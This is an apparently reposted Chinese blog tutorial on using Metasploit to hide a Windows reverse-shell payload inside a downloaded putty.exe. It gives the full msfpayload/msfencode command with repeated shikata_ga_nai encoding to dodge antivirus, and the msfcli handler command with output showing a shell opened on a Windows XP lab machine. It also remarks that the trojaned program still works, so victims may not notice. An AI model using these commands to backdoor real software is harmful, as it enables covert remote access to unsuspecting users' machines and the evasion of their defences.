metasploit隐秘地启动一个攻击载荷

来源:互联网 发布:老公是外国人知乎 编辑:程序博客网 时间:2024/04/26 14:43

在网上下载putty.exe,上传到bt5,然后复制到/opt/metasploit/msf3/work目录

root@bt:/opt/metasploit/msf3# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -t exe -x work/putty.exe -o putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)real    0m42.531suser    0m25.086ssys     0m16.381sroot@bt:/opt/metasploit/msf3# 

上传到XP,还是报威胁。



我关掉杀毒软件,然后双击putty_backdoor.exe,看看:



弹出这个,但是很快就没了,出现了一两秒的样子。

这时,当我在BT5运行msfcli时,它就一直显示,不会一闪而过:

root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 E[*] Please wait while we load the module tree...                          ########                  #                      #################            #                   ######################         #                  #########################      #                ############################               ##############################               ###############################              ###############################              ##############################                              #    ########   #                 ##        ###        ####   ##                                      ###   ###                                    ####   ###               ####          ##########   ####               #######################   ####                 ####################   ####                  ##################  ####                    ############      ##                       ########        ###                      #########        #####                    ############      ######                   ########      #########                     #####       ########                       ###       #########                      ######    ############                     #######################                     #   #   ###  #   #   ##                     ########################                      ##     ##   ##     ##       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]+ -- --=[ 927 exploits - 499 auxiliary - 151 post+ -- --=[ 251 payloads - 28 encoders - 8 nopsPAYLOAD => windows/shell_reverse_tcpLHOST => 192.168.1.11LPORT => 31337[*] Started reverse handler on 192.168.1.11:31337 [*] Starting the payload handler...[*] Command shell session 1 opened (192.168.1.11:31337 -> 192.168.1.142:1136) at 2013-04-28 06:13:58 -0400Microsoft Windows XP [版本 5.1.2600](C) 版权所有 1985-2001 Microsoft Corp.C:\1>

运行msfcli后,出现

[*] Starting the payload handler...

时,就双击putty_backdoor.exe,这时,那上面的图片所显示的登录的界面,就一直停留着了,不会像刚才那样,一闪而过了。

而且,它也有putty.exe的功能,能正常登录,如下图:




但是,当我在bt5退出时:

C:\1>exitexit[*] Command shell session 1 closed.  Reason: Died from Errno::ECONNRESETroot@bt:~# 

XP上的登录界面(如上图所示)也没有了。


这时,不明真相的人,可能并不会在意。不过,如果多试几次,可能会看出点问题来。


现在的问题是,这个exe惊动了杀毒软件,没有躲过杀毒软件。